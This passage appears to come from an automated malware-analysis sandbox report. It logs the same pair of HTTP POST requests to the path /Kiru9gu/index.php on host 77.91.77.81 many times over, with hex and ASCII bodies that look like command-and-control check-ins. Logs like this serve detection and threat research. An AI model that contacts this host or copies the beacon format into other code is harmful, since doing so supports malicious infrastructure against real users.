                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
